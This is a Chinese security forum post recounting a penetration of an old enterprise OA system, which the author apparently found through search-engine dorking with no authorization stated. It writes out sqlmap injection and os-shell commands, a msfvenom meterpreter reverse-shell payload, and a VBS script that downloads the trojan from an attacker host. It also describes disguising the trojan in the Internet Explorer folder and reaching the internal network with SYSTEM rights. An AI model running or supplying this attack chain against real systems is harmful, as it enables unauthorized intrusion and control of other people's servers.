安全矩阵

 找回密码
 立即注册
搜索
查看: 625|回复: 0

某OA系统SYSTEM权限SQL注入

[复制链接]

252

主题

252

帖子

1309

积分

金牌会员

Rank: 6Rank: 6

积分
1309
发表于 2023-3-14 15:28:35 | 显示全部楼层 |阅读模式
原文链接:某OA系统SYSTEM权限SQL注入

0x01 发现漏洞

七月正值暑假,闲暇时光在百度上inurl一番,找到了一个古老的企业OA系统


IP站点,没有域名,扫过一眼,.NET流行时代的普遍漏洞浮现在脑海里——SQL注入

在用户名里输入admin’,不负期望地报了错
很明显,前后端都没有对用户的输入进行过滤,直接将’带入了SQL语句进行。初步判断,此OA系统存在SQL注入漏洞。

0x02 漏洞验证

打开BurpSuite,设置好浏览器代理,抓下HTTP请求,一气呵成。
问题参数为 txtLogin=admin%27,可将整个请求复制到 test.txt,使用sqlmap -r 来注入
  1. sqlmap -u http://x.x.x.x/xx.aspx --forms
复制代码


至此,可以确认存在error-based、stack quires和time-based三个类型的漏洞

0x03 判断数据库用户的权限

发现SQL注入后,首先要判断权限,高权限的注入可以为后续渗透省下很大功夫
  1. sqlmap -u http://x.x.x.x/xx.aspx --forms --is-dba
复制代码

非常nice,再次不负期望地返回了DBA权限,输入以下命令,获得一个shell
  1. sqlmap -u http://x.x.x.x/xx.aspx --forms --os-shell
复制代码


NT/SYSTEM权限,时隔两个多月,复现有误,不予贴图

0x04 反弹shell 深入内网

生成一个shell
  1. msfvenom -p windows/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=xxxx > /var/www/html/shell.exe
复制代码

由于环境艰难,不能直接上传文件,我选择了用vbs脚本来下载木马到服务器

代码如下:
  1. Set post=CreateObject("Msxml2.XMLHTTP")
  2. post.Open "GET","http://x.x.x.x/shell.exe"
  3. '发送请求
  4. post.Send()
  5. Set aGet = CreateObject("ADODB.Stream")
  6. aGet.Mode = 3
  7. aGet.Type = 1
  8. aGet.Open()
  9. '等待3秒,等文件下载
  10. wscript.sleep 3000
  11. aGet.Write(post.responseBody)'写数据
  12. aGet.SaveToFile "shell.exe",2
复制代码

用echo命令缓慢地写完了vbs脚本之后,顺利运行,下载了木马

更改名字,移动到IE安装目录进行伪装
start iee.exe 运行木马,metasploit成功收到了SYSTEM权限的shell

该主机拥有内网IP,存在内网,可以互通,并且该主机作为中央数据库


此内网主机皆为VMware虚拟机

0x05 结束测试,提交漏洞

本次渗透测试成功拿到最高权限, 到此为止,不再深入。
随着攻击与防御技术的彼此攀升,程序员的安全意识逐渐提高,SQL也越来越少。
但不少粗糙的程序和古老的系统仍然存在此漏洞,此类漏洞解决方法简单,只用对用户输入参数稍加处理即可。




本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2024-11-28 20:35 , Processed in 0.012834 second(s), 19 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表